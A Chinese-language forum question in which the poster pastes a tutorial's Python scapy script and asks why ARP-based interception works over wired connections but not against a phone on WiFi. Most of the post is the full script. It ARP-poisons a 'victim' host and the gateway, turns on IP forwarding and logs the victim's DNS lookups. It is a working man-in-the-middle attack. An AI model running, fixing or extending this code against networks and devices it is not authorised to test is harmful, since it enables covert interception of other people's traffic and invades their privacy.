我最近观看了一个有关借助名为“ scapy”的python模块拦截网络流量的教程。 (https://www.youtube.com/watch?v=fkYd8MPzgts)。当我在机器上使用python代码时,它工作正常。我输入要拦截网络流量的主机的IP地址以及所用网关的IP。到目前为止,一切都很好。但是,一旦我开始输入手机的IP地址(使用Wifi与网关联系),该脚本就无法正常工作了。我只会不时收到数据包。拦截似乎不再可行。
我试图理解为什么会这样,尽管我还没有找到确切的答案。我认为,拦截在桌面上带来了一些问题,例如,与通过有线方式发送的数据包相比,通过空中发送的数据包“不稳定”得多。我可以想象,这会使Scapy脚本难以拦截。
我还想到了主机的arp缓存。在Gerenal中,计算机存储其网关的arp地址,以便更快地找到通过Internet进行通信的方式。但是,一旦通过网络发送了新的arp请求,就应该解决该“问题”。
可以在pastebin(https://pastebin.com/1cMu4kzZ)上找到该教程的代码,我在代码注释中添加了一些想法!这些不是由代码作者制作的:
from scapy.all import *
import threading
import os
import sys
# specify the ip addresses of the victim and gateway in order to intercept these two
VIP = raw_input('Please enter the IP address of the victim computer: ')
GW = raw_input('Please enter th IP address of the gateway: ')
IFACE = raw_input('Please enter the name of your interface: ')
print '\nMake sure you are running as root!, and enjoy. '
print '\t\t\nPoisoning Victim & Gateway! .. '
# set the parameter of ip forwarding to 1 i order to enable forwarding the intercepted packets to the router and vice versa
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') #Ensure the victim
recieves packets by forwarding them
# check if the received packets are the kind of packets we're intersted in (here: DNS packets)
def dnshandle(pkt):
if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:
print 'Victim: ' + VIP + ' has searched for: ' + pkt.getlayer(DNS).qd.qname
# create an arp packet which is sent to the victim (but we act as if it came from the gateway)
def v_poison():
v = ARP(pdst=VIP, psrc=GW)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
except KeyboardInterupt:
sys.exit(1)
# create an arp packet which is sent to the victim (but we act as if it came from the gateway)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
except KeyboardInterupt:
sys.exit(1)
vthread = []
gwthread = []
while True:
# make sure, that we send enough packets to fool the host and gateway that the ip of the gateway belongs to our host (associate the ip of the gateway with our MAC address)
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
# sniff with the help of the sniff function from scapy filtering for arp packets
pkt = sniff(iface=IFACE,filter='udp port 53',prn=dnshandle)
为什么与有线流量相比,Wifi流量无法(或至少更差)被拦截?